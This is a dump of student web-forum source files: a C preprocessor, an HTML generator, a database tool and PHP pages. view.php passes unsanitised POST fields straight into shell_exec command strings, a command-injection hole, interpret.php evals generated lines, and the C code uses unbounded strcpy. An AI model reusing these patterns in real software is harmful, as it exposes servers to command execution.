0;\n\n\t/* loop, looking for outer classes. */\n\tfor(i = 0; i < tokens->length; i++)\n\t{\n\t\tif(isClass(tokens, i))\n\t\t{\n\t\t\tinClass = 1;\t\n\t\t}\n\t\telse if(strcmp(tokens->contents[i], \"{\") == 0)\n\t\t{\n\t\t\tbracketCounter ++;\n\t\t}\n\t\telse if(strcmp(tokens->contents[i], \"}\") == 0)\n\t\t{\n\t\t\tbracketCounter --;\n\t\t\tif(bracketCounter == 0)\n\t\t\t{\n\t\t\t\tinClass = 0;\t\n\t\t\t\tinOuterFunc = 0;\n\t\t\t}\n\t\t}\n\t\t/* if we are not in a class, we need to check if it is a function */\n\t\telse if(inClass == 0 && isFunction(tokens, i))\n\t\t{\n\t\t\tinOuterFunc = 1;\n\t\t}\n\t\telse if(inOuterFunc == 1 && isValidName((char*)tokens->contents[i]) && isMemberFunctionCall(tokens, i))\n\t\t{\n\t\t\tmodifyFunctionCall(tokens, i);\n\t\t}\n\t}\n\n\treturn 0;\n}\n\nint modifyFunctionCall(Vector* tokens, int pos)\n{\n\tint i;\n\tint j;\n\tchar* className;\n\tchar* extraParam;\n\tchar* args;\n\tchar* newFName;\n\tchar* comma;\n\n\textraParam = malloc(sizeof(char) * 256);\n\targs = malloc(sizeof(char) * 512);\n\tcomma = malloc(sizeof(char) * 2);\n\n\targs[0] = '\\0';\n\tcomma[0] = '\\0';\n\tcomma[1] = '\\0';\n\n\tj = pos+2;\n\n\t/* creates the &className that will be added to the parameters */\n\tstrcpy(extraParam, \"&\");\n\tstrcpy(comma, \",\");\n\n\t/* gets the name of the class */\n\tfor(i = pos - 1; i >= 0; i--)\n\t{\n\t\tif(isValidName(tokens->contents[i]))\n\t\t{\n\t\t\t/* grabs the class variable name */\n\t\t\tstrcat(extraParam, tokens->contents[i]);\n\t\t\tclassName = getType(tokens, i);\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*)tokens->contents[i])[0]) && strcmp(tokens->contents[i], \".\") != 0)\n\t\t{\n\t\t\treturn -1;\n\t\t}\n\t}\n\n\twhile(strcmp(tokens->contents[j], \")\") != 0)\n\t{\n\t\tif(j >= tokens->length)\n\t\t{\n\t\t\treturn -1;\n\t\t}\n\t\t/* we don't want to include the opening bracket... */\n\t\tif(strcmp(tokens->contents[j], \"(\") != 0)\n\t\t{\n\t\t\t/* this adds on another part of the parameters, and then a space to delimit them. */\n\t\t\tif(isValidName(tokens->contents[j]))\n\t\t\t{\n\t\t\t\tchar* paramType;\n\t\t\t\tparamType = getType(tokens, j);\n\t\t\t\tif(isValidName(paramType))\n\t\t\t\t{\n\t\t\t\t\tstrcat(args, \"struct\");\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tstrcat(args, paramType);\n\t\t\t\t}\n\t\t\t\tfree(paramType);\n\t\t\t}\n\t\t\tstrcat(args, \",\");\n\t\t}\n\t\tj++;\n\t}\n\tnewFName = mangle(className, tokens->contents[pos], args);\n\n\tfree(tokens->contents[pos]);\n\ttokens->contents[pos] = newFName;\n\n\tinsert(tokens, extraParam, j);\n\tfor(i = j - 1; i > pos; i--)\n\t{\n\t\tif(strcmp(tokens->contents[i], \"(\") == 0)\n\t\t{\n\t\t\tfree(comma);\n\t\t\tbreak;\n\t\t}\n\t\telse if(!isspace(((char*) tokens->contents[i])[0]))\n\t\t{\n\t\t\tinsert(tokens, comma, j);\n\t\t\tbreak;\t\n\t\t}\n\t}\n\tfree(className);\n\tfree(args);\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.46296295523643494, "alphanum_fraction": 0.49176955223083496, "avg_line_length": 12.885714530944824, "blob_id": "9fe0b751d07c075d661d069b522604b57f77104e", "content_id": "f06debf4444bff19cf89e5dc6821bf847d4069f5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 486, "license_type": "no_license", "max_line_length": 85, "num_lines": 35, "path": "/interpret.php", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "<?php\n\n$inphp = 0;\n$script = \"\";\nforeach($output as $line)\n{\n\tif(substr($line, 0, 5) === \"<?php\" and substr($line, strlen($line) - 2, 2) === \"?>\")\n\t{\n\t\teval(substr($line, 5, strlen($line) - 7));\n\t\tcontinue;\n\t}\n\telseif(substr($line, 0, 5) === \"<?php\")\n\t{\n\t\t$inphp = 1;\n\t\tcontinue;\n\t}\n\telseif(substr($line, strlen($line) - 2, 2) === \"?>\")\n\t{\n\t\teval($script);\n\t\t$script = \"\";\n\t\t$inphp = 0;\t\n\t\tcontinue;\n\t}\n\n\tif($inphp == 0)\n\t{\n\t\techo $line;\n\t}\n\telse\n\t{\n\t\t$script = $script.$line;\n\t}\n}\n\n?>\n" }, { "alpha_fraction": 0.5335586667060852, "alphanum_fraction": 0.5393529534339905, "avg_line_length": 17.008695602416992, "blob_id": "5e557d9b73cd2ea4d2352828e49b36ca21a01c05", "content_id": "806cc9b9832d090240db6d3ab32d4ae7ffe5a2e2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 2071, "license_type": "no_license", "max_line_length": 114, "num_lines": 115, "path": "/view.php", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "<html>\n\n<head>\n\t<title>Viewing Streams</title>\n\t<link href=\"style.css\" type=\"text/css\" rel=\"stylesheet\">\n</head>\n\n<body>\n\n<?php\n\n/* recalculate $length every time. */\n$length = shell_exec(\"./view.py \\\"\".$_POST[\"username\"].\"\\\" \".$_POST[\"stream\"].\" 0 pdate len\");\n\n$index = '0';\n$order= 'pdate';\n$command = 'view';\n\n/* this would occur if we just got into the page. */\nif(!isset($_POST[\"index\"]))\n{\n\tif($_POST[\"stream\"] === \"all\")\n\t{\n\t\t$index = 0;\n\t}\n\telse\n\t{\n\t\t$eres = shell_exec(\"./view.py \\\"\".$_POST[\"username\"].\"\\\" \".$_POST[\"stream\"].\" 0 pdate last\");\n\n\t\t$index = $eres;\n\t}\n}\nelse\n{\n\t$index = $_POST[\"index\"];\n}\n\n\nif(!isset($_POST[\"order\"]))\n{\n\t$order = \"pdate\";\n}\nelse\n{\n\t$order = $_POST[\"order\"];\n}\n\n/* this reacts to the user inputs. */\nif(isset($_POST[\"userin\"]))\n{\n\t$command = $_POST[\"userin\"];\n\n\tif($command == \"next\")\n\t{\n\t\t$index = intval($_POST[\"index\"]) + 1;\n\t\tif($index >= $length)\n\t\t{\n\t\t\t$index = $length - 1;\n\t\t}\n\t}\n\telseif($command == \"prev\")\n\t{\n\t\t$index = intval($_POST[\"index\"]) - 1;\n\t\tif($index < 0)\n\t\t{\n\t\t\t$index = 0;\n\t\t}\n\t}\n\telse\n\t{\n\t\t$index = $_POST[\"index\"];\n\t}\n\n\tif($command == \"mark\")\n\t{\n\t\t$res = shell_exec(\"./view.py \\\"\".$_POST[\"username\"].\"\\\" \\\"\".$_POST[\"stream\"].\"\\\" \\\"\".$_POST[\"order\"].\"\\\" mark\");\n\t}\n\n\telseif($command == \"order\")\n\t{\n\t\tif($order === 'pdate')\n\t\t{\n\t\t\t$order = 'username';\n\t\t}\n\t\telseif($order === 'username')\n\t\t{\n\t\t\t$order = 'pdate';\n\t\t}\n\t\t$index = 0;\n\t}\n}\n\n$username = $_POST[\"username\"];\n$stream = $_POST[\"stream\"];\n\n$cmd = \"./view.py '$username' '$stream' '$index' '$order' 'view'\";\n$post = shell_exec($cmd);#\"./view.py julian bunnies 0 date view\");\n\nstr_replace(\"\\n\", \"<br>\", $post);\n$post = nl2br($post);\n\nexec(\"./create view.wpml\", $output, $result);\ninclude \"interpret.php\";\n\necho \"<input type=\\\"hidden\\\" form=\\\"command\\\" name=\\\"index\\\" value=\\\"$index\\\">\";\necho \"<input type=\\\"hidden\\\" form=\\\"switch\\\" name=\\\"index\\\" value=\\\"$index\\\">\";\n\necho \"<input type=\\\"hidden\\\" form=\\\"command\\\" name=\\\"order\\\" value=\\\"$order\\\">\";\necho \"<input type=\\\"hidden\\\" form=\\\"switch\\\" name=\\\"order\\\" value=\\\"$order\\\">\";\n\n?>\n\n</body>\n\n</html>\n" }, { "alpha_fraction": 0.5427196025848389, "alphanum_fraction": 0.5562575459480286, "avg_line_length": 15.057971000671387, "blob_id": "41a848613b3b392f6287f586a3b4357f02bc7ec2", "content_id": "73776100615eb8afb163b7b47b02245fc36fd592", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 6648, "license_type": "no_license", "max_line_length": 89, "num_lines": 414, "path": "/generation.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n * \tthis file contains source for an html generator. \n */\n#include \"generation.h\"\n#include \"tags.h\"\n\n#include <stdio.h>\n#include <stdlib.h>\n#include <string.h>\n\n\nvoid generatePage(char* fname)\n{\n\tchar line[2048];\n\tFILE* inFile;\n\n\tinFile = fopen(fname, \"r\");\n\tif(inFile == NULL)\n\t{\n\t\treturn;\n\t}\n\n\n\twhile(fgets(line, 2048, inFile) != NULL)\n\t{\n\t\tint i;\n\t\tchar** tags;\n\n\t\ti = 0;\n\n\t\t/* gets the tags on the line, separated by .s */\n\t\ttags = splitTagLine(line);\n\t\tif(tags != NULL)\n\t\t{\n\t\t\twhile(tags[i] != NULL)\n\t\t\t{\n\t\t\t\tchar* markup;\n\n\t\t\t\tmarkup = generateTag(tags[i]);\n\t\t\t\tputs(markup);\n\t\t\t\tputs(\"\");\n\n\t\t\t\tfree(tags[i]);\n\t\t\t\tfree(markup);\n\t\t\t\ti++;\n\t\t\t}\n\t\t\tfree(tags);\n\t\t}\n\n\t\t/* puts a break after a line of the config. */\n\t\tputs(LINE_BREAK);\n\t}\n\n\tfclose(inFile);\n\n\treturn;\n}\n\nchar* generateTag(char* configTag)\n{\n\tchar* markup;\n\n\tswitch(configTag[1])\n\t{\n\t\tcase('d'):\n\t\t\tmarkup = malloc(sizeof(char) * 5);\n\t\t\tstrcpy(markup, \"<hr>\");\n\t\t\tbreak;\n\t\tcase('t'):\n\t\t\tmarkup = createText(configTag);\n\t\t\tbreak;\n\t\tcase('h'):\n\t\t\tmarkup = createHeader(configTag);\n\t\t\tbreak;\n\t\tcase('l'):\n\t\t\tmarkup = createLink(configTag);\n\t\t\tbreak;\n\t\tcase('b'):\n\t\t\tmarkup = createButton(configTag);\n\t\t\tbreak;\n\t\tcase('i'):\n\t\t\tmarkup = createInput(configTag);\n\t\t\tbreak;\n\t\tcase('p'):\n\t\t\tmarkup = createPicture(configTag);\n\t\t\tbreak;\n\t\tcase('r'):\n\t\t\tmarkup = createRadio(configTag);\n\t\t\tbreak;\n\t\tcase('e'):\n\t\t\tmarkup = createExec(configTag);\n\t\t\tbreak;\n\t\tcase('f'): /* stands for 'format' */\n\t\t\tmarkup = createDiv(configTag);\n\t\t\tbreak;\n\t\tcase('g'):\n\t\t\tmarkup = malloc(sizeof(char) * (strlen(\"</div>\") + 1));\n\t\t\tstrcpy(markup, \"</div>\");\n\t\t\tbreak;\n\t\tcase('z'):\n\t\t\tmarkup = createDependency(configTag);\n\t\t\tbreak;\n\t\tcase('a'):\n\t\t\tmarkup = createAdd(configTag);\n\t\t\tbreak;\n\t\tcase('v'):\n\t\t\tmarkup = createView(configTag);\n\t\t\tbreak;\n\t\tcase('w'):\n\t\t\tmarkup = createPost(configTag);\n\t\t\tbreak;\n\t\tcase('s'):\n\t\t\tmarkup = createSelector(configTag);\n\t\t\tbreak;\n\t}\n\n\treturn markup;\n}\n\nchar* getValue(char* attribute)\n{\n\tint i;\n\tint startVal;\n\tint endVal;\n\tint cpos;\n\n\tchar* value;\n\n\t/* collect the starting position for the tag's value. */\n\tfor(i = 0; i < strlen(attribute); i++)\n\t{\n\t\tif(attribute[i] == '=')\n\t\t{\n\t\t\t/* this means we have a \" delimiting the attribute value. */\n\t\t\tif(i + 1 < strlen(attribute) && attribute[i + 1] == '\\\"')\n\t\t\t{\n\t\t\t\tstartVal = i + 2;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t\telse\n\t\t\t{\n\t\t\t\tstartVal = i + 1;\n\t\t\t\tbreak;\n\t\t\t}\n\t\t}\n\t}\n\n\t/* if this value ends with a quote, we need to avoid storing it. */\n\tif(attribute[strlen(attribute) - 1] == '\\\"')\n\t{\n\t\tendVal = strlen(attribute) - 2;\n\t}\n\telse\n\t{\n\t\tendVal = strlen(attribute) - 1;\n\t}\n\n\tvalue = malloc(sizeof(char) * (endVal - startVal + 2));\n\tif(value == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\t/* set the writing position to 0. */\n\tcpos = 0;\n\n\t/* collect all value characters. */\n\tfor(i = startVal; i <= endVal; i++)\n\t{\n\t\tvalue[cpos] = attribute[i];\n\t\tcpos ++;\n\t}\n\n\t/* store the null terminator. */\n\tvalue[cpos] = '\\0';\n\n\treturn value;\n}\n\n\nchar** splitTagLine(char* tagLine)\n{\n\tint i;\n\tint j;\n\tint numTags;\n\tint inString;\n\n\tchar** tags;\n\n\tnumTags = 0;\n\tinString = 0;\n\n\t/* collect number of periods, this, when incrimented, is the number of arguments. */\n\tfor(i = 0; i < strlen(tagLine); i++)\n\t{\n\t\t/* capture periods. */\n\t\tif(tagLine[i] == '.')\n\t\t{\n\t\t\tif(inString == 0)\n\t\t\t{\n\t\t\t\tnumTags ++;\n\t\t\t}\n\t\t}\n\t\telse if(tagLine[i] == '\\\"')\n\t\t{\n\t\t\tif(inString == 1)\n\t\t\t{\n\t\t\t\tinString = 0;\n\t\t\t}\n\t\t\telse if(inString == 0)\n\t\t\t{\n\t\t\t\tinString = 1;\n\t\t\t}\n\t\t}\n\t}\n\n\ttags = malloc(sizeof(char*) * (numTags + 1));\n\tif(tags == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\t/* reset the string flag */\n\tinString = 0;\n\n\tj = 1;\n\tfor(i = 0; i < numTags; i++)\n\t{\n\t\tint charsWritten;\n\t\tchar tagBuffer[2048];\n\n\t\t/* pre-adds a period. */\n\t\ttagBuffer[0] = '.';\n\n\t\tcharsWritten = 1;\n\n\t\twhile((tagLine[j] != '.' && tagLine[j] != '\\n') || inString == 1)\n\t\t{\n\t\t\ttagBuffer[charsWritten] = tagLine[j];\n\n\t\t\t/* set the inString variable. */\n\t\t\tif(tagLine[j] == '\\\"')\n\t\t\t{\n\t\t\t\tif(inString == 1)\n\t\t\t\t{\n\t\t\t\t\tinString = 0;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tinString = 1;\n\t\t\t\t}\n\t\t\t}\n\t\t\tcharsWritten++;\n\t\t\tj++;\n\t\t}\n\n\t\ttags[i] = malloc(sizeof(char) * (charsWritten + 1));\n\t\tif(tags[i] == NULL)\n\t\t{\n\t\t\tint k;\n\t\t\tfor(k = i; k >= 0; k--)\n\t\t\t{\n\t\t\t\tfree(tags[k]);\n\t\t\t}\n\t\t\tfree(tags);\n\n\t\t\treturn NULL;\n\t\t}\n\n\t\ttagBuffer[charsWritten] = '\\0';\n\t\tstrcpy(tags[i], tagBuffer);\n\n\t\t/* if we reached the end of the string */\n\t\tif(tagLine[j] == '\\n')\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\telse if(tagLine[j] == '.')\n\t\t{\n\t\t\tj++;\n\t\t}\n\t}\n\n\ttags[numTags] = NULL;\n\treturn tags;\n}\n\nchar** getArgs(char* wholeTag)\n{\n\tint i;\n\tint j;\n\tint startBracket;\n\tint endBracket;\n\tint numArgs;\n\tint inString;\n\n\tchar** args;\n\n\tnumArgs = 1;\n\tinString = 0;\n\n\tstartBracket = 2;\n\tendBracket = strlen(wholeTag) - 1;\n\n\t/* TODO add support for in-string commas and brackets */\n\n\t/* if there is more than *nothing* between the two brackets */\n\tif(endBracket - startBracket > 1)\n\t{\n\t\tinString = 0;\n\t\t/* count the number of brackets present in the file; each one denote a new argument. */\n\t\tfor(i = startBracket; i <= endBracket; i++)\n\t\t{\n\t\t\tif(wholeTag[i] == ',')\n\t\t\t{\n\t\t\t\tif(inString == 0)\n\t\t\t\t{\n\t\t\t\t\tnumArgs ++;\n\t\t\t\t}\n\t\t\t}\n\t\t\telse if(wholeTag[i] == '\"')\n\t\t\t{\n\t\t\t\tif(inString == 1)\n\t\t\t\t{\n\t\t\t\t\tinString = 0;\n\t\t\t\t}\n\t\t\t\telse if(inString == 0)\n\t\t\t\t{\n\t\t\t\t\tinString = 1;\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\t/* return NULL, there are no arguments. */\n\telse\n\t{\n\t\treturn NULL;\n\t}\n\n\targs = malloc(sizeof(char*) * (numArgs + 1));\n\tif(args == NULL)\n\t{\n\t\treturn NULL;\n\t}\n\n\tj = startBracket + 1;\n\tinString = 0;\n\t/* loop through the args, but not the last one. */\n\tfor(i = 0; i < numArgs; i++)\n\t{\n\t\tint charsWritten;\n\t\tchar argBuffer[1024];\n\n\t\tcharsWritten = 0;\n\n\t\t/* grab the current argument's characters */\n\t\twhile((wholeTag[j] != ',' && j < strlen(wholeTag) - 1) || inString == 1)\n\t\t{\n\t\t\targBuffer[charsWritten] = wholeTag[j];\n\t\t\tif(wholeTag[j] == '\\\"')\n\t\t\t{\n\t\t\t\tif(inString == 1)\n\t\t\t\t{\n\t\t\t\t\tinString = 0;\n\t\t\t\t}\n\t\t\t\telse\n\t\t\t\t{\n\t\t\t\t\tinString = 1;\n\t\t\t\t}\n\t\t\t}\n\t\t\tcharsWritten ++;\n\t\t\tj++;\n\t\t}\n\n\t\t/* upon exiting the loop, what was the last character read? a comma? */\n\t\targs[i] = malloc(sizeof(char) * (charsWritten + 1));\n\t\tif(args[i] == NULL)\n\t\t{\n\t\t\tint k;\n\n\t\t\t/* if we fail to malloc, free every previous argument */\n\t\t\tfor(k = i; k >= 0; k--)\n\t\t\t{\n\t\t\t\tfree(args[k]);\n\t\t\t}\n\t\t\tfree(args);\n\t\t}\n\n\t\targBuffer[charsWritten] = '\\0';\n\t\tstrcpy(args[i], argBuffer);\n\n\t\t/* this means we have arrived at the end of the CURRENT tag! */\n\t\tif(wholeTag[j] == ')')\n\t\t{\n\t\t\tbreak;\n\t\t}\n\t\telse if(wholeTag[j] == ',')\n\t\t{\n\t\t\t/* skips the comma/end brace */\n\t\t\tj++;\n\t\t}\n\t}\n\n\t/* like a strings, the array of strings is NULL terminated! */\n\targs[numArgs] = NULL;\n\n\treturn args;\n}\n" }, { "alpha_fraction": 0.6884287595748901, "alphanum_fraction": 0.6947737336158752, "avg_line_length": 33.02840805053711, "blob_id": "5b85754d9d57da603ebe3765de64de522184cabb", "content_id": "34ce79c2c0b7b8e87ffc229502e5850b84cd5ded", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 5989, "license_type": "no_license", "max_line_length": 79, "num_lines": 176, "path": "/recognize.h", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "/**\n *\tJulian Sovernigo\n *\t0948924\n *\tCIS*2750_W17\n *\tgsoverni\n *\[email protected]\n *\n * \tthis file contains functions that are used to identify special patterns\n * \tthat occur in c/cpp files, such as function calls/declarations, variables,\n * \tclass declarations, and other things.\n */\n#ifndef __GSOVERNIGO_RECOGNIZE_H__\n#define __GSOVERNIGO_RECOGNIZE_H__\n\n#include\"vector.h\"\n\n/**\n *\tnstrchr\n *\treturns the number of characters character, which are containted in string.\n *\tPlease note, the nomenclature for this function comes from string.h's family\n *\tof strchr, strstr, strnchr, and strnstr functions, used to find characters\n *\tIN:\t\t\tstring\t\t\t- the string that will be examined for character\n *\t\t\t\tcharacter\t\t- the character to be matched.\n *\tOUT:\t\tthe number of characters character that are found in string, or\n *\t\t\t\tshould an error occur, -1 shall be returned instead.\n *\tPOST:\t\tnone.\n *\tERRO:\t\tstring is null, signaled by return of -1.\n */\nint nstrchr(char* string, char charac);\n\n/**\n *\tisValidName\n *\tchecks the current name for conformity to the c standard \n *\tIN:\t\t\tname\t\t\t- the name that will be checked for conformity\n *\tOUT:\t\treturn 1 if the name is valid, 0 otherwise.\n *\tPOST:\t\tinteger returned.\n *\tERROR:\t\tname is null.\n */\nint isValidName(char* name);\n\n/**\n * \tgetTypeID\n * \tgets the character id for the variable that is located at position pos in\n * \ttokens.\n * \tIN:\t\t\ttokens\t\t\t- the tokens that make up the program\n * \t\t\t\tpos\t\t\t\t- the position we are starting at\n * \tOUT:\t\ta single char, representing the type of the variable\n * \tPOST:\t\ta character has been returned\n *\tERROR:\t\ttokens are null, or pos does not point to a location that does\n *\t\t\t\tnot define a variable\n */\nchar getTypeID(Vector* tokens, int pos);\n\n/**\n *\tgetType\n *\tgets the type of the variable we are located at.\n *\tIN:\t\t\ttokens\t\t\t- the tokens that we are looking through.\n *\t\t\t\tpos\t\t\t\t- the position we are located at right now.\n *\tOUT:\t\ta malloced string that represents the type of the variable at pos\n *\tPOST:\t\tthe returned string should be destroyed or used somehow.\n *\tERROR:\t\ttokens is null, pos does not point to a variable\n */\nchar* getType(Vector* tokens, int pos);\n\n/**\n *\tisValidType\n *\tchecks if the type is valid, returns true if so. Checks restricted keywords\n *\tIN:\t\t\ttype\t\t\t- the type string that is to be checked\n *\tOUT:\t\t-1 if there is an error, 1 if the type is an *atomic*, 2 if it is\n *\t\t\t\ta valid prefix, 3 if it is a class.\n *\tPOST:\t\tan integer has been returned to the calling function.\n *\tERROR:\t\ttype is null.\n */\nint isValidType(char* type);\n\n/**\n *\tisClass\n *\tchecks preceeding and following tokens to ensure the current index is a\n *\tclass declaration/definition (essentially the same thing at this point)\n *\tIN:\t\t\ttokens\t\t\t- the tokens vector that will be checked\n *\t\t\t\tpos\t\t\t\t- the position of the vector that we will check\n *\tOUT:\t\t1 if the current token is a class, o otherwise\n *\tPOST:\t\tinteger returned.\n *\tERROR\t\ttokens null, pos invalid.\n */\nint isClass(Vector* tokens, int pos);\n\n/**\n *\tisFunction\n *\tchecks if the tokens at pos represents a function\n *\tIN:\t\t\ttokens\t\t\t- a vector filled with the program tokens.\n *\t\t\t\tpos\t\t\t\t- a position that should represent a function\n *\tOUT:\t\t1 if the function is valid, 0 if not\n *\tPOST:\t\tnumber returned, check it\n *\tERROR:\t\ttokens is null, pos is invalid\n */\nint isFunction(Vector* tokens, int pos);\n\n/**\n * \tisFunctionCall\n * \tchecks if the tokens at pos represents a call to a function\n * \tIN:\t\t\ttokens\t\t\t- the tokens filled with the program\n * \t\t\t\tpos\t\t\t\t- the position we are checking.\n * \tOUT:\t\t1 if valid, 0 if not.\n * \tPOST:\t\tnumber returned.\n * \tERROR:\t\ttokens is null, pos is invalid\n */\nint isFunctionCall(Vector* tokens, int pos);\n\n/**\n *\tisMemberFunction\n *\tchecks if the tokens at pos represents a member function\n *\tIN:\t\t\ttokens\t\t\t- a vector filled with the program tokens.\n *\t\t\t\tpos\t\t\t\t- a position that should represent a function\n *\tOUT:\t\t1 if the function is valid, 0 if not\n *\tPOST:\t\tnumber returned, check it\n *\tERROR:\t\ttokens is null, pos is invalid\n */\nint isMemberFunctionCall(Vector* tokens, int pos);\n\n/**\n *\tisFunctionPointer\n *\tchecks if the tokens at pos represents a function pointer\n *\tIN:\t\t\ttokens\t\t\t- a vector filled with the program tokens.\n *\t\t\t\tpos\t\t\t\t- a position that should represent a function\n *\tOUT:\t\t1 if the function is valid, 0 if not\n *\tPOST:\t\tnumber returned, check it\n *\tERROR:\t\ttokens is null, pos is invalid\n */\nint isFunctionPointer(Vector* tokens, int pos);\n\n/**\n *\tbeginsFunction\n *\tchecks if the tokens at pos represents the beginning of a function\n *\tIN:\t\t\ttokens\t\t\t- a vector filled with the program tokens.\n *\t\t\t\tpos\t\t\t\t- a position that should represent a function\n *\tOUT:\t\t1 if the function is valid, 0 if not\n *\tPOST:\t\tnumber returned, check it\n *\tERROR:\t\ttokens is null, pos is invalid\n */\nint beginsFunction(Vector* tokens, int pos);\n\n/**\n *\tisVariable\n *\tchecks if the tokens at pos represents a variable\n *\tIN:\t\t\ttokens\t\t\t- a vector filled with the program tokens.\n *\t\t\t\tpos\t\t\t\t- a position that should represent a function\n *\tOUT:\t\t1 if the function is valid, 0 if not\n *\tPOST:\t\tnumber returned, check it\n *\tERROR:\t\ttokens is null, pos is invalid\n */\nint isVariable(Vector* tokens, int pos);\n\n/**\n *\tisVariableDeclaration\n *\tchecks if the tokens at pos represents a variable declaration\n *\tIN:\t\t\ttokens\t\t\t- a vector filled with the program tokens.\n *\t\t\t\tpos\t\t\t\t- a position that should represent a function\n *\tOUT:\t\t1 if the function is valid, 0 if not\n *\tPOST:\t\tnumber returned, check it\n *\tERROR:\t\ttokens is null, pos is invalid\n */\nint isVariableDeclaration(Vector* tokens, int pos);\n\n/**\n *\tisClassVariable\n *\tchecks if the tokens at pos represents a class variable\n *\tIN:\t\t\ttokens\t\t\t- a vector filled with the program tokens.\n *\t\t\t\tpos\t\t\t\t- a position that should represent a function\n *\tOUT:\t\t1 if the function is valid, 0 if not\n *\tPOST:\t\tnumber returned, check it\n *\tERROR:\t\ttokens is null, pos is invalid\n */\nint isClassVariable(Vector* tokens, int pos);\n\n#endif\n" }, { "alpha_fraction": 0.6014370322227478, "alphanum_fraction": 0.6174978613853455, "avg_line_length": 19.929203033447266, "blob_id": "a6fbaa1bc8a61f70062ca480235d630cf9139301", "content_id": "18d4c86529d57545095a9b617c8f4b25282f62ba", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 2366, "license_type": "no_license", "max_line_length": 97, "num_lines": 113, "path": "/db.c", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "\n#include \"dbutils.h\"\n\n#include <mysql/mysql.h>\n#include <stdio.h>\n#include <string.h>\n#include <stdlib.h>\n\nint main(int argc, char** argv)\n{\n\tint result;\n\tchar command[64];\n\tchar username[64];\n\tchar stream[64];\n\tint index;\n\tchar order[64];\n\tMYSQL mysql;\n\n\n\tif(argc < 2)\n\t{\n\t\tputs(\"Incorrect usage. Please invoke as:\\n\\t./db [-clear][-reset][-posts][-users][-streams]\");\n\t\treturn 1;\n\t}\n\telse\n\t{\n\t\tstrcpy(command, argv[1]);\n\t\tif(argc > 5)\n\t\t{\n\t\t\tstrcpy(username, argv[2]);\n\t\t\tstrcpy(stream, argv[3]);\n\t\t\tindex = atoi(argv[4]);\t\t\n\t\t\tstrcpy(order, argv[5]);\n\t\t}\n\t}\n\n\tresult = mysql_startConnect(&mysql);\n\n\tif(result < 0)\n\t{\n\t\tputs(\"Error in initializing SQL\");\n\t}\n\n\tresult = 0;\n\n\tif(strcmp(command, \"-clear\") == 0)\n\t{\n\t\tresult = mysql_clear(&mysql);\n\t}\n\telse if(strcmp(command, \"-make\") == 0)\n\t{\n\t\tresult = mysql_make(&mysql);\n\t}\n\telse if(strcmp(command, \"-reset\") == 0)\n\t{\n\t\tresult = mysql_reset(&mysql);\n\t}\n\telse if(strcmp(command, \"-posts\") == 0)\n\t{\n\t\tresult = mysql_posts(&mysql);\n\t}\n\telse if(strcmp(command, \"-users\") == 0)\n\t{\n\t\tresult = mysql_users(&mysql);\n\t}\n\telse if(strcmp(command, \"-streams\") == 0)\n\t{\n\t\tresult = mysql_streams(&mysql);\n\t}\n\telse if(strcmp(command, \"-help\") == 0)\n\t{\n\t\tputs(\"NAME\\n\\tdb - manages an sql database to hold message posts.\\n\");\n\t\tputs(\"SYNOPSIS\\n\\tdb [command]\\n\");\n\t\tputs(\"DESCRIPTION\\n\");\n\t\tputs(\"\\t-make\\n\\t\\tcreates the databases to be used to store the messages.\\n\");\n\t\tputs(\"\\t-clear\\n\\t\\tclears the database files of all entries.\\n\");\n\t\tputs(\"\\t-reset\\n\\t\\tdrops all the tables from the database.\\n\");\n\t\tputs(\"\\t-posts\\n\\t\\tprints all the posts that are in the database.\\n\");\n\t\tputs(\"\\t-streams\\n\\t\\tprints all the streams found in the database.\\n\");\n\t\tputs(\"\\t-users\\n\\t\\tprints all the users found in the database.\\n\");\n\t\tputs(\"\\t-help\\n\\t\\t... really...?\\n\");\n\t\tputs(\"AUTHOR\\n\\tJulian Sovernigo\\n\\[email protected]\\n\\t0948924\");\n\t}\n\telse if(strcmp(command, \"last\") == 0)\n\t{\n\t\tint lr;\n\n\t\tlr = getLastRead(username, stream, &mysql);\n\t\tprintf(\"%d\\n\", lr);\n\t}\n\telse if(strcmp(command, \"view\") == 0)\n\t{\n\t\tgetPostN(username, stream, order, index, &mysql);\n\t}\n\telse if(strcmp(command, \"len\") == 0)\n\t{\n\t\tint nposts;\n\n\t\tnposts = numposts(stream, &mysql);\n\t\tprintf(\"%d\\n\", nposts);\n\t}\n\telse if(strcmp(command, \"streams\") == 0)\n\t{\n\t\tgetStreams(username, &mysql);\t\n\t}\n\n\tif(result != 0)\n\t{\n\t\tputs(\"Something went wrong!\");\n\t}\n\n\n\treturn 0;\n}\n" }, { "alpha_fraction": 0.5734870433807373, "alphanum_fraction": 0.5782901048660278, "avg_line_length": 19.019229888916016, "blob_id": "42a32bf0e594947eba924ffb008151b335eafff9", "content_id": "5f0b4bad4b4223f9e51e5a5d96da246554a79899", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "PHP", "length_bytes": 1041, "license_type": "no_license", "max_line_length": 58, "num_lines": 52, "path": "/addauthor.php", "repo_name": "jsovernigo/cis2750-A4", "src_encoding": "UTF-8", "text": "<html>\n\n<head>\n\t<title>Add or Remove from Streams</title>\n\t<link href=\"style.css\" type=\"text/css\" rel=\"stylesheet\">\n</head>\n\n<body>\n\n<?php\n\n/* this is used to add/remove something to a stream. 